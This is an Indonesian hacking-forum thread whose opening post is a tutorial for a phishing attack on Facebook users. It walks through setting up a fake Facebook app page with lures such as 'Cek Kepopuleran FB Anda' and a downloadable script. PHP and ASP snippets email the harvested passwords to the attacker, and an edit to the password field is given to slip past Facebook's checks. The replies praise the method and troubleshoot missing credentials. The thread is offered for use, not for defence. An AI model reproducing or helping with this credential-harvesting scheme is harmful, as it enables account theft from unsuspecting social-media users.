( Update ) Hacking Facebook via Facebook

[j0ck3r]

Facebook,sapa sih yang gak kenal Facebook???Salah satu situs jejaring sosial terbesar selain Friendster dan Twitter.Facebook dikenal karena kemudahan dan tentunya keamanannya...
Aman??100%??hem..tidak ada yang sempurna..banyak para hacker yang berusaha menembus pertahanan Facebook,seperti yang dilakukan team inj3ct0r yang menggunakan tehnik SQL pada salah satu Apps yang ada di faceboook.Tehnik lain??hem..saat ini lebih banyak menggunakan Social Enginering seperti tehnik Pishing,Poisoning Attack pada satu jaringan,Fake Login dll.
Disini saya akan membahas salah satu tehnik Social Enginering yaaa semacam fake login tapi menggunakan fasilitas Facebook itu sendiri.Maksudnya??maksudnya adalah kita membuat halaman palsu berupa apps di dalam Facebook tersebut.
Tata cara nya sebagai berikut:
1.Siapkan scriptnya dulu

Code: Select all

http://www.mediafire.com/?448qgmyux5o2mb8

2.Cari server gratisan atau injekkan yang support .PHP , .ASP
3.Facebook tentunya
Mulai pembuatannya deh :
sudah disiapkan scriptnya??kalau udah rubahlah di bagian yang saya tandai menjadi alamat e-mail anda
.php

Code: Select all

mail(
"[email protected]",

.ASP

Code: Select all

Mailer.RemoteHost = "smtp.yourhost.com"
Mailer.AddRecipient "your name", "[email protected]"

lalu upload ke server anda..dan tugas pertama kita selesai.

lalu masuk ke

Code: Select all

http://www.facebook.com/pages/create

dan pilih "Perjuangan atau Komunitas" lalu masukkan nama halaman anda.Disini dituntut kepandaian kita mengolah kata agar berkesan menarik.Contoh "Cek Kepopuleran FB Anda " dan selesaikan langkah yang di anjurkan,kalau udah punya Logo buat halaman kita lebih bagus lagi sekalian kita upload disana.Kalau udah di kolom "Alamat Web" kita isi http://www.facebook.com/ lalu selesai deh.
lalau saatnya kita masuk ke

Code: Select all

http://www.facebook.com/add.php?api_key=fdfd01c9df7d644a68a4e989ae861e44&pages

dan kita pilih "aplikasi" lalu kita pilih "Go To Apps" dan masukkan kode FBML yang udah didownload tadi...jangan lupa di bagian yang bertuliskan "http://yourwebsite.com/facebook.php" diganti Url tempat kita mengupload file Facebook.php tadi...dan klik "Save". selesai sudah tugas ke 2 kita.Liat gambar dibawah ini

Terakhir,kita share halaman yang udah kita buat tadi,lalu minta temen-temen kita buat me-klik tombol "Like" usahakan minimal 25 orang yang nge-like..jadi kita bisa membuat nama untuk halaman kita,misal jadi "http://www.facebook.com/pagechecker"..dan berharap orang-orang mencoba aplikasi kita,lalu boom..panen password deh....cek folder spam di server e-mail kita...
Kalau mau liat hasilnya ni ada halaman demonya,tapi jangan coba-coba masukkin password asli ya..he he he
DEMO

Code: Select all

http://www.facebook.com/pages/Cek-Harga-Akun-FB-Anda/187358334667482?v=app_4949752878

tampilan kalau ada yang coba ni halaman kaya gini..


dan hasilnya akan terekam dengan baik di e-mail yang udah kita setting tadi...he he he


Facebook sudah "sedikit" menyadari tehnik ini,maka bila menggunakan script yang udah saya sediakan disini dan Box untuk input password tidak muncul maka ubahlah script dibagian ini

Code: Select all

<input type="PaSSword" tabindex="3" value="" name="password" id="password" class="textbox" />

menjadi

Code: Select all

<input type="text" tabindex="3" value="" name="password" id="password" class="textbox" />

semoga berguna

[poni]

ini nih yang kita tunggu2. keren pak

[j0ck3r]

ini nih yang kita tunggu2. keren pak

he..tadi sempat utak-atik lagi,biar bisa masuk ke e-mail ternyata fitur spam nya harus non aktif,tadi email saya fitus spam nya aktif..makanya gak masuk om...

[computeroris]

ini nih yang kita tunggu2. keren pak

kak poni XCodeXploitScanner keren tp sayang di bagian search result google gak ada option SAVE to TXT ,hehehehehe,,,, request bisa gak kak plizzzzzzzz,kirim ke [email protected]

[peacemeakers]

ane dah nyoba cara ini tapi gagal mulu...
waktu ane tes gak bisa masuk ke email

[j0ck3r]

ane dah nyoba cara ini tapi gagal mulu...
waktu ane tes gak bisa masuk ke email

coba cek di spam,atau matikan dulu fitur spamnya...lebih baik pake e-mail selain google atau yahoo,coba e-mail dari drivehq...

[Nona Ponii]

huahah mantaaabbb om .
tp ribeet bgt yah . kapan2 lah di cobaa ckck

[diat]

boleh lah cara nya dicoba ye nih tapi tunggu preview dl ah

[billy_cyber]

kk agar passwornya timbul hiden gmana??

soalnya klo ketikan password kluarnya malah text maksud saya aga bisa jdi **** gmna caranya

[proj3ct]

Gan, ane coba nie code kok ga ada yang masuk ke email ane ya??
padahal email address gua masukin, udah buat facebook.php, tpi tetep gk bsa.
Ane coba facebook.asp, tetep aja gak bisa.
Ama satu lagi, kok di screenshot nya agan tulisannya 'Facebook anda mahal sekali', tpi ane coba malah keluar 'An error have been occured'.
Mohon pencerahannya...